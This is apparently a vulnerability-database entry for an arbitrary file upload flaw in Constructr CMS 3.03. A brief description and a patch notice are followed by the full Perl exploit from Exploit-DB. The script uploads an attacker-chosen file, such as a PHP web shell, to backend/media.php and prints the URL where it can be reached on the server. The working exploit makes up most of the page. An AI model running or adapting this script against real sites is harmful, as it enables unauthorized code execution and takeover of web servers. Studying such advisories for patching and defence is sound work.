Constructr CMS 3.03 Arbitrary File Upload

vendor:

Constructr CMS

by:

plucky

8.8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Constructr CMS

Affected Version From: 03.03

Affected Version To: 03.03

Patch Exists: YES

Related CWE: N/A

CPE: a:constructr_cms:constructr_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Constructr CMS 3.03 Arbitrary File Upload

Constructr CMS 3.03 is vulnerable to an arbitrary file upload vulnerability. An attacker can upload a malicious file to the server, which can be used to execute arbitrary code on the server. This vulnerability is due to insufficient validation of the uploaded file type. An attacker can exploit this vulnerability by uploading a malicious file to the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of Constructr CMS.

Source

Exploit-DB raw data:

#!/usr/bin/env perl

# Constructr CMS 3.03 Arbitrary File Upload
#
# Author: plucky
# Email:  io.plucky@gmail.com     
#
# Vulnerable Page: /constructr/backend/media.php [line 
# App Download:    http://sourceforge.net/projects/constructr/
#
# Date: 23/03/2011
# THX TO: yawn, shrod, h473 and DoMinO

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw( POST );


my $host           = '';
my $file_to_upload = '';
my $new_file_name  = '';
my $file_extension = '';


sub exploit_usage {

    print 'Constructr CMS 3.03 Arbitrary File Upload'                                        . "\n".
          '-------------------------'                                                        . "\n".
          'Author: plucky'                                                                   . "\n".
          'Email:  io.plucky@gmail.com'                                                      . "\n".
          '-------------------------'                                                        . "\n". 
          'Usage:'                                                                           . "\n".
          '        perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]'                       . "\n".
          'Example:'                                                                         . "\n".
          '        perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n";

    exit;

}

sub file_parse {

    my $file_name       = '';
    my $file_extension  = '';
    my $file_to_upload  = '';
    my $rfile_to_upload = '';


    $rfile_to_upload = shift;
    $file_to_upload  = ${$rfile_to_upload};

    $file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;

    $file_name      = $1;
    $file_extension = $2;

    return ( $file_name, $file_extension )

}

sub upload_file {

    my $host            = '';
    my $rhost           = '';
    my $file_name       = '';
    my $file_extension  = '';
    my $response        = '';
    my $path            = '';
    my $html            = '';
    my $user_agent      = '';
    my $file_to_upload  = '';
    my $rfile_to_upload = '';
    my $new_file_name   = '';


    ( $rhost, $rfile_to_upload ) = @_;

    $host           = ${$rhost};
    $file_to_upload = ${$rfile_to_upload};

    $user_agent = LWP::UserAgent->new;
    $path       = $host . 'backend/media.php';


    $response = $user_agent->post(
        $path,
        [
            'create_file' => 'try',
            'file'        => [$file_to_upload],
        ],
        'Content_Type' => 'form-data'
    );


    ( $file_name, $file_extension ) = file_parse( \$file_to_upload );


    $html = $response->decoded_content;
    $html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;

    $new_file_name = $1;

    return ( $new_file_name, $file_extension );

}

@ARGV == 2
           ? ( $host, $file_to_upload ) = @ARGV
           : exploit_usage();

( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );


print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";